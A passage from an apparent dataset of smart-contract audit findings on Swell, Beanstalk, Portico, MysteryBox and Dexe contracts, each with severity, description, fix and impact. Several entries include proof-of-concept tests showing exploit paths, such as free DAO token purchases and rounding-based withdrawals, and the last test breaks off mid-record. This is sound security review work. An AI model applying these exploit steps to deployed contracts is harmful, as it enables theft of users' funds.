processWithdrawals(\\n uint256 _lastTokenIdToProcess,\\n uint256 _processedRate\\n) external override checkRole(SwellLib.BOT) {\\n```\\n\\nThe final rate used is the lesser of `rateWhenCreated` and _processedRate:\\n```\\nuint256 finalRate = _processedRate > rateWhenCreated\\n ? rateWhenCreated\\n : _processedRate;\\n```\\n\\nThis final rate is multiplied by the requested withdrawal amount to determine the actual amount sent to the user requesting a withdrawal:\\n```\\nuint256 requestExitedETH = wrap(amount).mul(wrap(finalRate)).unwrap();\\n```\\n\\nHence `SwellLib.BOT` can subtly rug-pull all withdrawals by setting `_processedRate = 0` when calling `swEXIT::processWithdrawals`.чTwo possible mitigations:\\nChange `swEXIT::processWithdrawals` to always fetch the current rate from `swETH::swETHToETHRate`\\nOnly allow `swEXIT::processWithdrawals` to be called by the `RepricingOracle` contract which calls it correctly.чч```\\nuint256 rateWhenCreated = AccessControlManager.swETH().swETHToETHRate();\\n```\\n -Check for staleness of data when fetching Proof of Reserves via Chainlink `Swell ETH PoR` Oracleчlowч`RepricingOracle::_assertRepricingSnapshotValidity` uses the `Swell ETH PoR` Chainlink Proof Of Reserves Oracle to fetch an off-chain data source for Swell's current reserves.\\nThe Oracle `Swell ETH PoR` is listed on Chainlink's website as having a heartbeat of `86400` seconds (check the \"Show More Details\" box in the top-right corner of the table), however no staleness check is implemented by RepricingOracle:\\n```\\n// @audit no staleness check\\n(, int256 externallyReportedV3Balance, , , ) = AggregatorV3Interface(\\n ExternalV3ReservesPoROracle\\n).latestRoundData();\\n```\\nчImplement a staleness check and if the Oracle is stale, either revert or skip using it as the code currently does if the oracle is not set.\\nFor multi-chain deployments ensure that a correct staleness check is used for each feed as the same feed can have different heartbeats on different chains.\\nConsider adding an off-chain bot that periodically checks if the Oracle has become stale and if it has, raises an internal alert for the team to investigate.чIf the `Swell ETH PoR` Chainlink Proof Of Reserves Oracle has stopped functioning correctly, `RepricingOracle::_assertRepricingSnapshotValidity` will continue processing with stale reserve data as if it were fresh.ч```\\n// @audit no staleness check\\n(, int256 externallyReportedV3Balance, , , ) = AggregatorV3Interface(\\n ExternalV3ReservesPoROracle\\n).latestRoundData();\\n```\\n -Precision loss in `swETH::_deposit` from unnecessary hidden division before multiplicationчlowч`swETH::_deposit` L170 contains a hidden unnecessary division before multiplication as the call to `_ethToSwETHRate` performs a division which then gets multiplied by msg.value:\\n```\\nuint256 swETHAmount = wrap(msg.value).mul(_ethToSwETHRate()).unwrap();\\n// @audit expanding this out\\n// wrap(msg.value).mul(_ethToSwETHRate()).unwrap();\\n// wrap(msg.value).mul(wrap(1 ether).div(_swETHToETHRate())).unwrap();\\n```\\n\\nThis issue has not been introduced in the new changes but is in the mainnet code.чRefactor to perform multiplication before division:\\n```\\nuint256 swETHAmount = wrap(msg.value).mul(wrap(1 ether)).div(_swETHToETHRate()).unwrap();\\n```\\nчSlightly less `swETH` will be minted to depositors. While the amount by which individual depositors are short-changed is individually small, the effect is cumulative and increases as depositors and deposit size increase.\\nProof of Concept: This stand-alone stateless fuzz test can be run inside Foundry to prove this as well as provided hard-coded test cases:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.23;\\n\\nimport {UD60x18, wrap} from \"@prb/math/src/UD60x18.sol\";\\n\\nimport \"forge-std/Test.sol\";\\n\\n// run from base project directory with:\\n// (fuzz test) forge test --match-test FuzzMint -vvv\\n// (hardcoded) forge test --match-test HardcodedMint -vvv\\ncontract MintTest is Test {\\n\\n uint256 private constant SWETH_ETH_RATE = 1050754209601187151; //as of 2024-02-15\\n\\n function _mintOriginal(uint256 inputAmount) private pure returns(uint256) {\\n // hidden division before multiplication\\n // wrap(inputAmount).mul(_ethToSwETHRate()).unwrap();\\n // wrap(inputAmount).mul(wrap(1 ether).div(_swETHToETHRate())).unwrap()\\n\\n return wrap(inputAmount).mul(wrap(1 ether).div(wrap(SWETH_ETH_RATE))).unwrap();\\n }\\n\\n function _mintFixed(uint256 inputAmount) private pure returns(uint256) {\\n // refactor to perform multiplication before division\\n // wrap(inputAmount).mul(wrap(1 ether)).div(_swETHToETHRate()).unwrap();\\n\\n return wrap(inputAmount).mul(wrap(1 ether)).div(wrap(SWETH_ETH_RATE)).unwrap();\\n }\\n\\n function test_FuzzMint(uint256 inputAmount) public pure {\\n uint256 resultOriginal = _mintOriginal(inputAmount);\\n uint256 resultFixed = _mintFixed(inputAmount);\\n\\n assert(resultOriginal == resultFixed);\\n }\\n\\n function test_HardcodedMint() public {\\n // found by fuzzer\\n console.log(_mintFixed(3656923177187149889) - _mintOriginal(3656923177187149889)); // 1\\n\\n // 100 eth\\n console.log(_mintFixed(100 ether) - _mintOriginal(100 ether)); // 21\\n\\n // 1000 eth\\n console.log(_mintFixed(1000 ether) - _mintOriginal(1000 ether)); // 215\\n\\n // 10000 eth\\n console.log(_mintFixed(10000 ether) - _mintOriginal(10000 ether)); // 2159\\n }\\n}\\n```\\nч```\\nuint256 swETHAmount = wrap(msg.value).mul(_ethToSwETHRate()).unwrap();\\n// @audit expanding this out\\n// wrap(msg.value).mul(_ethToSwETHRate()).unwrap();\\n// wrap(msg.value).mul(wrap(1 ether).div(_swETHToETHRate())).unwrap();\\n```\\n -Attacker can abuse `RewardsDistributor::triggerRoot` to block reward claims and unpause a paused stateчmediumчConsider the code of RewardsDistributor::triggerRoot:\\n```\\n function triggerRoot() external {\\n bytes32 rootCandidateAValue = rootCandidateA.value;\\n if (rootCandidateAValue != rootCandidateB.value || rootCandidateAValue == bytes32(0)) revert RootCandidatesInvalid();\\n root = Root({value: rootCandidateAValue, lastUpdatedAt: block.timestamp});\\n emit RootChanged(msg.sender, rootCandidateAValue);\\n }\\n```\\n\\nThis function:\\ncan be called by anyone\\nif it succeeds, sets `root.value` to `rootCandidateA.value` and `root.lastUpdatedAt` to `block.timestamp`\\ndoesn't reset `rootCandidateA` or `rootCandidateB`, so it can be called over and over again to continually update `root.lastUpdatedAt` or to set `root.value` to `rootCandidateA.value`.чTwo possible options:\\nMake `RewardsDistributor::triggerRoot` a permissioned function such that an attacker can't call it\\nChange `RewardsDistributor::triggerRoot` to reset `rootCandidateA.value = zeroRoot` such that it can't be successfully called repeatedly.чAn attacker can abuse this function in 2 ways:\\nby calling it repeatedly an attacker can continually increase `root.lastUpdatedAt` to trigger the claim delay revert in `RewardsDistributor::claimAll` effectively blocking reward claims\\nby calling it after reward claims have been paused, an attacker can effectively unpause the paused state since `root.value` is over-written with the valid value from `rootCandidateA.value` and claim pausing works by setting `root.value == zeroRoot`.ч```\\n function triggerRoot() external {\\n bytes32 rootCandidateAValue = rootCandidateA.value;\\n if (rootCandidateAValue != rootCandidateB.value || rootCandidateAValue == bytes32(0)) revert RootCandidatesInvalid();\\n root = Root({value: rootCandidateAValue, lastUpdatedAt: block.timestamp});\\n emit RootChanged(msg.sender, rootCandidateAValue);\\n }\\n```\\n -`RewardsDistributor` doesn't correctly handle deposits of fee-on-transfer incentive tokensчmediumч`the kenneth` stated in telegram that Fee-On-Transfer tokens are fine to use as incentive tokens with `RewardsDistributor`, however when receiving Fee-On-Transfer tokens and storing the reward amount the accounting does not account for the fee deducted from the transfer amount in-transit, for example:\\n```\\nfunction _depositLPIncentive(\\n StoredReward memory reward,\\n uint256 amount,\\n uint256 periodReceived\\n) private {\\n IERC20(reward.token).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amount\\n );\\n\\n // @audit stored `amount` here will be incorrect since it doesn't account for\\n // the actual amount received after the transfer fee was deducted in-transit\\n _storeReward(periodReceived, reward, amount);\\n}\\n```\\nчIn `RewardsDistributor::_depositLPIncentive` & depositVoteIncentive:\\nread the `before` transfer token balance of `RewardsDistributor` contract\\nperform the token transfer\\nread the `after` transfer token balance of `RewardsDistributor` contract\\ncalculate the difference between the `after` and `before` balances to get the true amount that was received by the `RewardsDistributor` contract accounting for the fee that was deducted in-transit\\nuse the true received amount to generate events and write the received incentive token amounts to `RewardsDistributor::periodRewards`.\\nAlso note that `RewardsDistributor::periodRewards` is never read in the contract, only written to. If it is not used by off-chain processing then consider removing it.чThe actual reward calculation is done off-chain and is outside the audit scope nor do we have visibility of that code. But events emitted by `RewardsDistributor` and the stored incentive token deposits in `RewardsDistributor::periodRewards` use incorrect amounts for Fee-On-Transfer incentive token deposits.ч```\\nfunction _depositLPIncentive(\\n StoredReward memory reward,\\n uint256 amount,\\n uint256 periodReceived\\n) private {\\n IERC20(reward.token).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amount\\n );\\n\\n // @audit stored `amount` here will be incorrect since it doesn't account for\\n // the actual amount received after the transfer fee was deducted in-transit\\n _storeReward(periodReceived, reward, amount);\\n}\\n```\\n -Use low level `call()` to prevent gas griefing attacks when returned data not requiredчlowчUsing `call()` when the returned data is not required unnecessarily exposes to gas griefing attacks from huge returned data payload. For example:\\n```\\n(bool sent, ) = _to.call{value: _amount}(\"\");\\nrequire(sent);\\n```\\n\\nIs the same as writing:\\n```\\n(bool sent, bytes memory data) = _to.call{value: _amount}(\"\");\\nrequire(sent);\\n```\\n\\nIn both cases the returned data will be copied into memory exposing the contract to gas griefing attacks, even though the returned data is not used at all.чUse a low-level call when the returned data is not required, eg:\\n```\\nbool sent;\\nassembly {\\n sent := call(gas(), _to, _amount, 0, 0, 0, 0)\\n}\\nif (!sent) revert FailedToSendEther();\\n```\\nчContract unnecessarily exposed to gas griefing attacks.ч```\\n(bool sent, ) = _to.call{value: _amount}(\"\");\\nrequire(sent);\\n```\\n -No precision scaling or minimum received amount check when subtracting `relayerFeeAmount` can revert due to underflow or return less tokens to user than specifiedчmediumч`PorticoFinish::payOut` L376 attempts to subtract the `relayerFeeAmount` from the final post-bridge and post-swap token balance:\\n```\\nfinalUserAmount = finalToken.balanceOf(address(this)) - relayerFeeAmount;\\n```\\n\\nThere is no precision scaling to ensure that PorticoFinish's token contract balance and `relayerFeeAmount` are in the same decimal precision; if the `relayerFeeAmount` has 18 decimal places but the token is USDC with only 6 decimal places, this can easily revert due to underflow resulting in the bridged tokens being stuck.\\nAn excessively high `relayerFeeAmount` could also significantly reduce the amount of post-bridge and post-swap tokens received as there is no check on the minimum amount of tokens the user will receive after deducting `relayerFeeAmount`. This current configuration is an example of the \"MinTokensOut For Intermediate, Not Final Amount\" vulnerability class; as the minimum received tokens check is before the deduction of `relayerFeeAmount` a user will always receive less tokens than their specified minimum if `relayerFeeAmount > 0`.чEnsure that token balance and `relayerFeeAmount` have the same decimal precision before combining them. Alternatively check for underflow and don't charge a fee if this would be the case. Consider enforcing the user-specified minimum output token check again when deducting `relayerFeeAmount`, and if this would fail then decrease `relayerFeeAmount` such that the user at least receives their minimum specified token amount.\\nAnother option is to check that even if it doesn't underflow, that the remaining amount after subtracting `relayerFeeAmount` is a high percentage of the bridged amount; this would prevent a scenario where `relayerFeeAmount` takes a large part of the bridged amount, effectively capping `relayerFeeAmount` to a tiny % of the post-bridge and post-swap funds. This scenario can still result in the user receiving less tokens than their specified minimum however.\\nFrom the point of view of the smart contract, it should protect itself against the possibility of the token amount and `relayerFeeAmount` being in different decimals or that `relayerFeeAmount` would be too high, similar to how for example L376 inside `payOut` doesn't trust the bridge reported amount and checks the actual token balance.чBridged tokens stuck or user receives less tokens than their specified minimum.ч```\\nfinalUserAmount = finalToken.balanceOf(address(this)) - relayerFeeAmount;\\n```\\n -Use low level `call()` to prevent gas griefing attacks when returned data not requiredчlowчUsing `call()` when the returned data is not required unnecessarily exposes to gas griefing attacks from huge returned data payload. For example:\\n```\\n(bool sentToUser, ) = recipient.call{ value: finalUserAmount }(\"\");\\nrequire(sentToUser, \"Failed to send Ether\");\\n```\\n\\nIs the same as writing:\\n```\\n(bool sentToUser, bytes memory data) = recipient.call{ value: finalUserAmount }(\"\");\\nrequire(sentToUser, \"Failed to send Ether\");\\n```\\n\\nIn both cases the returned data will be copied into memory exposing the contract to gas griefing attacks, even though the returned data is not used at all.чUse a low-level call when the returned data is not required, eg:\\n```\\nbool sent;\\nassembly {\\n sent := call(gas(), recipient, finalUserAmount, 0, 0, 0, 0)\\n}\\nif (!sent) revert Unauthorized();\\n```\\n\\nConsider using ExcessivelySafeCall.чContract unnecessarily exposed to gas griefing attacks.ч```\\n(bool sentToUser, ) = recipient.call{ value: finalUserAmount }(\"\");\\nrequire(sentToUser, \"Failed to send Ether\");\\n```\\n -The previous milestone stem should be scaled for use with the new gauge point system which uses untruncated values moving forwardчhighчWithin the Beanstalk Silo, the milestone stem for a given token is the cumulative amount of grown stalk per BDV for this token at the last `stalkEarnedPerSeason` update. Previously, the milestone stem was stored in its truncated representation; however, the seed gauge system now stores the value in its untruncated form due to the new granularity of grown stalk and the frequency with which these values are updated.\\nAt the time of upgrade, the previous (truncated) milestone stem for each token should be scaled for use with the gauge point system by multiplying up by a factor of `1e6`. Otherwise, there will be a mismatch in decimals when calculating the stem tip.\\n```\\n_stemTipForToken = s.ss[token].milestoneStem +\\n int96(s.ss[token].stalkEarnedPerSeason).mul(\\n int96(s.season.current).sub(int96(s.ss[token].milestoneSeason))\\n );\\n```\\nчScale up the existing milestone stem for each token:\\n```\\nfor (uint i = 0; i < siloTokens.length; i// Add the line below\\n// Add the line below\\n) {\\n// Add the line below\\n s.ss[siloTokens[i]].milestoneStem = int96(s.ss[siloTokens[i]].milestoneStem.mul(1e6));\\n```\\n\\n\\clearpageчThe mixing of decimals between the old milestone stem (truncated) and the new milestone stem (untruncated, after the first `gm` call following the BIP-39 upgrade) breaks the existing grown stalk accounting, resulting in a loss of grown stalk for depositors.\\nProof of Concept: The previous implementation returns the cumulative stalk per BDV with 4 decimals:\\n```\\n function stemTipForToken(address token)\\n internal\\n view\\n returns (int96 _stemTipForToken)\\n {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n\\n // SafeCast unnecessary because all casted variables are types smaller that int96.\\n _stemTipForToken = s.ss[token].milestoneStem +\\n int96(s.ss[token].stalkEarnedPerSeason).mul(\\n int96(s.season.current).sub(int96(s.ss[token].milestoneSeason))\\n ).div(1e6); //round here\\n }\\n```\\n\\nWhich can be mathematically abstracted to: $$StemTip(token) = getMilestonStem(token) + (current \\ season - getMilestonStemSeason(token)) \\times \\frac{stalkEarnedPerSeason(token)}{10^{6}}$$\\nThis division by $10^{6}$ happens because the stem tip previously had just 4 decimals. This division allows backward compatibility by not considering the final 6 decimals. Therefore, the stem tip MUST ALWAYS have 4 decimals.\\nThe milestone stem is now updated in each `gm` call so long as all LP price oracles pass their respective checks. Notably, the milestone stem is now stored with 10 decimals (untruncated), hence why the second term of the abstraction has omited the `10^{6}` division in `LibTokenSilo::stemTipForTokenUntruncated`.\\nHowever, if the existing milestone stem is not escalated by $10^{6}$ then the addition performed during the upgrade and in subsequent `gm` calls makes no sense. This is mandatory to be handled within the upgrade otherwise every part of the protocol which calls `LibTokenSilo.stemTipForToken` will receive an incorrect value, except for BEAN:ETH Well LP (given it was created after the Silo v3 upgrade).\\nSome instances where this function is used include:\\n`EnrootFacet::enrootDeposit`\\n`EnrootFacet::enrootDeposits`\\n`MetaFacet::uri`\\n`ConvertFacet::_withdrawTokens`\\n`LibSilo::__mow`\\n`LibSilo::_removeDepositFromAccount`\\n`LibSilo::_removeDepositsFromAccount`\\n`Silo::_plant`\\n`TokenSilo::_deposit`\\n`TokenSilo::_transferDeposits`\\n`LibLegacyTokenSilo::_mowAndMigrate`\\n`LibTokenSilo::_mowAndMigrate`\\nAs can be observed, critical parts of the protocol are compromised, leading to further cascading issues.ч```\\n_stemTipForToken = s.ss[token].milestoneStem +\\n int96(s.ss[token].stalkEarnedPerSeason).mul(\\n int96(s.season.current).sub(int96(s.ss[token].milestoneSeason))\\n );\\n```\\n -Both reserves should be checked in `LibWell::getWellPriceFromTwaReserves`чlowч```\\nfunction getWellPriceFromTwaReserves(address well) internal view returns (uint256 price) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n // s.twaReserve[well] should be set prior to this function being called.\\n // 'price' is in terms of reserve0:reserve1.\\n if (s.twaReserves[well].reserve0 == 0) {\\n price = 0;\\n } else {\\n price = s.twaReserves[well].reserve0.mul(1e18).div(s.twaReserves[well].reserve1);\\n }\\n}\\n```\\n\\nCurrently, `LibWell::getWellPriceFromTwaReserves` sets the price to zero if the time-weighted average reserves of the zeroth reserve (for Wells, Bean) is zero. Given the implementation of `LibWell::setTwaReservesForWell`, and that a Pump failure will return an empty reserves array, it does not appear possible to encounter the case where one reserve can be zero without the other except for perhaps an exploit or migration scenario. Therefore, whilst unlikely, it is best to but best to ensure both reserves are non-zero to avoid a potential division by zero `reserve1` when calculating the price as a revert here would result in DoS of `SeasonFacet::gm`.\\n```\\nfunction setTwaReservesForWell(address well, uint256[] memory twaReserves) internal {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n // if the length of twaReserves is 0, then return 0.\\n // the length of twaReserves should never be 1, but\\n // is added for safety.\\n if (twaReserves.length < 1) {\\n delete s.twaReserves[well].reserve0;\\n delete s.twaReserves[well].reserve1;\\n } else {\\n // safeCast not needed as the reserves are uint128 in the wells.\\n s.twaReserves[well].reserve0 = uint128(twaReserves[0]);\\n s.twaReserves[well].reserve1 = uint128(twaReserves[1]);\\n }\\n}\\n```\\n\\nAdditionally, to correctly implement the check identified by the comment in `LibWell::setTwaReservesForWell`, the time-weighted average reserves in storage should be reset if the array length is less-than or equal-to 1.ч```\\n// LibWell::getWellPriceFromTwaReserves`\\n// Remove the line below\\n if (s.twaReserves[well].reserve0 == 0) {\\n// Add the line below\\n if (s.twaReserves[well].reserve0 == 0 || s.twaReserves[well].reserve1 == 0) {\\n price = 0;\\n} else {\\n\\n// LibWell::setTwaReservesForWell\\n// Remove the line below\\n if (twaReserves.length < 1) {\\n// Add the line below\\n if (twaReserves.length <= 1) {\\n delete s.twaReserves[well].reserve0;\\n delete s.twaReserves[well].reserve1;\\n} else {\\n```\\nчч```\\nfunction getWellPriceFromTwaReserves(address well) internal view returns (uint256 price) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n // s.twaReserve[well] should be set prior to this function being called.\\n // 'price' is in terms of reserve0:reserve1.\\n if (s.twaReserves[well].reserve0 == 0) {\\n price = 0;\\n } else {\\n price = s.twaReserves[well].reserve0.mul(1e18).div(s.twaReserves[well].reserve1);\\n }\\n}\\n```\\n -Small unripe token withdrawals don't decrease BDV and StalkчlowчFor any whitelisted token where `bdvCalc(amountDeposited) < amountDeposited`, a user can deposit that token and then withdraw in small amounts to avoid decreasing BDV and Stalk. This is achieved by exploiting a rounding down to zero precision loss in LibTokenSilo::removeDepositFromAccount:\\n```\\n// @audit small unripe bean withdrawals don't decrease BDV and Stalk\\n// due to rounding down to zero precision loss. Every token where\\n// `bdvCalc(amountDeposited) < amountDeposited` is vulnerable\\nuint256 removedBDV = amount.mul(crateBDV).div(crateAmount);\\n```\\nч`LibTokenSilo::removeDepositFromAccount` should revert if `removedBDV == 0`. A similar check already exists in `LibTokenSilo::depositWithBDV` but is missing in `removeDepositFromAccount()` when calculating `removedBDV` for partial withdrawals.\\nThe breaking of protocol invariants could lead to other serious issues that have not yet been identified but may well exist if core properties do not hold. We would urge the team to consider fixing this bug as soon as possible, prior to or as part of the BIP-39 upgrade.чAn attacker can withdraw deposited assets without decreasing BDV and Stalk. While the cost to perform this attack is likely more than the value an attacker would stand to gain, the potential impact should definitely be explored more closely especially considering the introduction of the Unripe Chop Convert in BIP-39 as this could have other unintended consequences in relation to this bug (given that the inflated BDV of an Unripe Token will persist once deposit is converted to its ripe counterpart, potentially allowing value to be extracted that way depending on how this BDV is used/manipulated elsewhere).\\nThe other primary consideration for this bug is that it breaks the mechanism that Stalk is supposed to be lost when withdrawing deposited assets and keeps the `totalDepositedBdv` artificially high, violating the invariant that the `totalDepositedBdv` value for a token should be the sum of the BDV value of all the individual deposits.\\nProof of Concept: Add this PoC to `SiloToken.test.js` under the section describe(\"1 deposit, some\", async function () {:\\n```\\nit('audit small unripe bean withdrawals dont decrease BDV and Stalks', async function () {\\n let initialUnripeBeanDeposited = to6('10');\\n let initialUnripeBeanDepositedBdv = '2355646';\\n let initialTotalStalk = pruneToStalk(initialUnripeBeanDeposited).add(toStalk('0.5'));\\n\\n // verify initial state\\n expect(await this.silo.getTotalDeposited(UNRIPE_BEAN)).to.eq(initialUnripeBeanDeposited);\\n expect(await this.silo.getTotalDepositedBdv(UNRIPE_BEAN)).to.eq(initialUnripeBeanDepositedBdv);\\n expect(await this.silo.totalStalk()).to.eq(initialTotalStalk);\\n\\n // snapshot EVM state as we want to restore it after testing the normal\\n // case works as expected\\n let snapshotId = await network.provider.send('evm_snapshot');\\n\\n // normal case: withdrawing total UNRIPE_BEAN correctly decreases BDV & removes stalks\\n const stem = await this.silo.seasonToStem(UNRIPE_BEAN, '10');\\n await this.silo.connect(user).withdrawDeposit(UNRIPE_BEAN, stem, initialUnripeBeanDeposited, EXTERNAL);\\n\\n // verify UNRIPE_BEAN totalDeposited == 0\\n expect(await this.silo.getTotalDeposited(UNRIPE_BEAN)).to.eq('0');\\n // verify UNRIPE_BEAN totalDepositedBDV == 0\\n expect(await this.silo.getTotalDepositedBdv(UNRIPE_BEAN)).to.eq('0');\\n // verify silo.totalStalk() == 0\\n expect(await this.silo.totalStalk()).to.eq('0');\\n\\n // restore EVM state to snapshot prior to testing normal case\\n await network.provider.send(\"evm_revert\", [snapshotId]);\\n\\n // re-verify initial state\\n expect(await this.silo.getTotalDeposited(UNRIPE_BEAN)).to.eq(initialUnripeBeanDeposited);\\n expect(await this.silo.getTotalDepositedBdv(UNRIPE_BEAN)).to.eq(initialUnripeBeanDepositedBdv);\\n expect(await this.silo.totalStalk()).to.eq(initialTotalStalk);\\n\\n // attacker case: withdrawing small amounts of UNRIPE_BEAN doesn't decrease\\n // BDV and doesn't remove stalks. This lets an attacker withdraw their deposits\\n // without losing Stalks & breaks the invariant that the totalDepositedBDV should\\n // equal the sum of the BDV of all individual deposits\\n let smallWithdrawAmount = '4';\\n await this.silo.connect(user).withdrawDeposit(UNRIPE_BEAN, stem, smallWithdrawAmount, EXTERNAL);\\n\\n // verify UNRIPE_BEAN totalDeposited has been correctly decreased\\n expect(await this.silo.getTotalDeposited(UNRIPE_BEAN)).to.eq(initialUnripeBeanDeposited.sub(smallWithdrawAmount));\\n // verify UNRIPE_BEAN totalDepositedBDV remains unchanged!\\n expect(await this.silo.getTotalDepositedBdv(UNRIPE_BEAN)).to.eq(initialUnripeBeanDepositedBdv);\\n // verify silo.totalStalk() remains unchanged!\\n expect(await this.silo.totalStalk()).to.eq(initialTotalStalk);\\n});\\n```\\n\\nRun with: `npx hardhat test --grep \"audit small unripe bean withdrawals dont decrease BDV and Stalks\"`.\\nAdditional Mainnet fork tests have been written to demonstrate the presence of this bug in the current and post-BIP-39 deployments of Beanstalk (see Appendix B).ч```\\n// @audit small unripe bean withdrawals don't decrease BDV and Stalk\\n// due to rounding down to zero precision loss. Every token where\\n// `bdvCalc(amountDeposited) < amountDeposited` is vulnerable\\nuint256 removedBDV = amount.mul(crateBDV).div(crateAmount);\\n```\\n -Broken check in `MysteryBox::fulfillRandomWords()` fails to prevent same request being fulfilled multiple timesчhighчConsider the check which attempts to prevent the same request from being fulfilled multiple times:\\n```\\nif (vrfRequests[_requestId].fulfilled) revert InvalidVrfState();\\n```\\n\\nThe problem is that `vrfRequests[_requestId].fulfilled` is never set to `true` anywhere and `vrfRequests[_requestId]` is deleted at the end of the function.чSet `vrfRequests[_requestId].fulfilled = true`.\\nConsider an optimized version which involves having 2 mappings `activeVrfRequests` and fulfilledVrfRequests:\\nrevert `if(fulfilledVrfRequests[_requestId])`\\nelse set `fulfilledVrfRequests[_requestId] = true`\\nfetch the matching active request into memory from `activeVrfRequests[_requestId]` and continue processing as normal\\nat the end `delete activeVrfRequests[_requestId]`\\nThis only stores forever the `requestId` : `bool` pair in `fulfilledVrfRequests`.\\nConsider a similar approach in `MysteryBox::fulfillBoxAmount()`.чThe same request can be fulfilled multiple times which would override the previous randomly generated seed; a malicious provider who was also a mystery box minter could generate new randomness until they got a rare mystery box.ч```\\nif (vrfRequests[_requestId].fulfilled) revert InvalidVrfState();\\n```\\n -Use low level `call()` to prevent gas griefing attacks when returned data not requiredчlowчUsing `call()` when the returned data is not required unnecessarily exposes to gas griefing attacks from huge returned data payload. For example:\\n```\\n(bool sent, ) = address(operatorAddress).call{value: msg.value}(\"\");\\nif (!sent) revert Unauthorized();\\n```\\n\\nIs the same as writing:\\n```\\n(bool sent, bytes memory data) = address(operatorAddress).call{value: msg.value}(\"\");\\nif (!sent) revert Unauthorized();\\n```\\n\\nIn both cases the returned data will have to be copied into memory exposing the contract to gas griefing attacks, even though the returned data is not required at all.чUse a low-level call when the returned data is not required, eg:\\n```\\nbool sent;\\nassembly {\\n sent := call(gas(), receiver, amount, 0, 0, 0, 0)\\n}\\nif (!sent) revert Unauthorized();\\n```\\n\\nConsider using ExcessivelySafeCall.чContracts unnecessarily expose themselves to gas griefing attacks.ч```\\n(bool sent, ) = address(operatorAddress).call{value: msg.value}(\"\");\\nif (!sent) revert Unauthorized();\\n```\\n -`TokenSaleProposal::buy` implicitly assumes that buy token has 18 decimals resulting in a potential total loss scenario for Dao Poolчhighч`TokenSaleProposalBuy::buy` is called by users looking to buy the DAO token using a pre-approved token. The exchange rate for this sale is pre-assigned for the specific tier. This function internally calls `TokenSaleProposalBuy::_purchaseWithCommission` to transfer funds from the buyer to the gov pool. Part of the transferred funds are used to pay the DexeDAO commission and balance funds are transferred to the `GovPool` address. To do this, `TokenSaleProposalBuy::_sendFunds` is called.\\n```\\n function _sendFunds(address token, address to, uint256 amount) internal {\\n if (token == ETHEREUM_ADDRESS) {\\n (bool success, ) = to.call{value: amount}(\"\");\\n require(success, \"TSP: failed to transfer ether\");\\n } else {\\n IERC20(token).safeTransferFrom(msg.sender, to, amount.from18(token.decimals())); //@audit -> amount is assumed to be 18 decimals\\n }\\n }\\n```\\n\\nNote that this function assumes that the `amount` of ERC20 token is always 18 decimals. The `DecimalsConverter::from18` function converts from a base decimal (18) to token decimals. Note that the `amount` is directly passed by the buyer and there is no prior normalisation done to ensure the token decimals are converted to 18 decimals before the `_sendFunds` is called.чThere are at least 2 options for mitigating this issue:\\nOption 1 - revise the design decision that all token amounts must be sent in 18 decimals even if the underlying token decimals are not 18, to instead that all token amounts should be sent in their native decimals and Dexe will convert everything.\\nOption 2 - keep current design but revert if `amount.from18(token.decimals()) == 0` in L90 or alternatively use the `from18Safe()` function which uses `_convertSafe()` that reverts if the conversion is 0.\\nThe project team should also examine other areas where the same pattern occurs which may have the same vulnerability and where it may be required to revert if the conversion returns 0:\\n`GovUserKeeper` L92, L116, L183\\n`GovPool` L248\\n`TokenSaleProposalWhitelist` L50\\n`ERC721Power` L113, L139\\n`TokenBalance` L35, L62чIt is easy to see that for tokens with smaller decimals, eg. USDC with 6 decimals, will cause a total loss to the DAO. In such cases amount is presumed to be 18 decimals & on converting to token decimals(6), this number can round down to 0.\\nProof of Concept:\\nTier 1 allows users to buy DAO token at exchange rate, 1 DAO token = 1 USDC.\\nUser intends to buy 1000 Dao Tokens and calls `TokenSaleProposal::buy` with `buy(1, USDC, 1000*10**6)\\nDexe DAO Comission is assumed 0% for simplicity- > `sendFunds` is called with `sendFunds(USDC, govPool, 1000* 10**6)`\\n`DecimalConverter::from18` function is called on amount with base decimals 18, destination decimals 6: `from18(1000*10**6, 18, 6)`\\nthis gives `1000*10**6/10*(18-6) = 1000/ 10**6` which rounds to 0\\nBuyer can claim 1000 DAO tokens for free. This is a total loss to the DAO.\\nAdd PoC to TokenSaleProposal.test.js:\\nFirst add a new line around L76 to add new purchaseToken3:\\n```\\n let purchaseToken3;\\n```\\n\\nThen add a new line around L528:\\n```\\n purchaseToken3 = await ERC20Mock.new(\"PurchaseMockedToken3\", \"PMT3\", 6);\\n```\\n\\nThen add a new tier around L712:\\n```\\n {\\n metadata: {\\n name: \"tier 9\",\\n description: \"the ninth tier\",\\n },\\n totalTokenProvided: wei(1000),\\n saleStartTime: timeNow.toString(),\\n saleEndTime: (timeNow + 10000).toString(),\\n claimLockDuration: \"0\",\\n saleTokenAddress: saleToken.address,\\n purchaseTokenAddresses: [purchaseToken3.address],\\n exchangeRates: [PRECISION.times(1).toFixed()],\\n minAllocationPerUser: 0,\\n maxAllocationPerUser: 0,\\n vestingSettings: {\\n vestingPercentage: \"0\",\\n vestingDuration: \"0\",\\n cliffPeriod: \"0\",\\n unlockStep: \"0\",\\n },\\n participationDetails: [],\\n },\\n```\\n\\nThen add the test itself under the section describe(\"if added to whitelist\", () => {:\\n```\\n it(\"audit buy implicitly assumes that buy token has 18 decimals resulting in loss to DAO\", async () => {\\n await purchaseToken3.approve(tsp.address, wei(1000));\\n\\n // tier9 has the following parameters:\\n // totalTokenProvided : wei(1000)\\n // minAllocationPerUser : 0 (no min)\\n // maxAllocationPerUser : 0 (no max)\\n // exchangeRate : 1 sale token for every 1 purchaseToken\\n //\\n // purchaseToken3 has 6 decimal places\\n //\\n // mint purchase tokens to owner 1000 in 6 decimal places\\n // 1000 000000\\n let buyerInitTokens6Dec = 1000000000;\\n\\n await purchaseToken3.mint(OWNER, buyerInitTokens6Dec);\\n await purchaseToken3.approve(tsp.address, buyerInitTokens6Dec, { from: OWNER });\\n\\n //\\n // start: buyer has bought no tokens\\n let TIER9 = 9;\\n let purchaseView = userViewsToObjects(await tsp.getUserViews(OWNER, [TIER9]))[0].purchaseView;\\n assert.equal(purchaseView.claimTotalAmount, wei(0));\\n\\n // buyer attempts to purchase using 100 purchaseToken3 tokens\\n // purchaseToken3 has 6 decimals but all inputs to Dexe should be in\\n // 18 decimals, so buyer formats input amount to 18 decimals\\n // doing this first to verify it works correctly\\n let 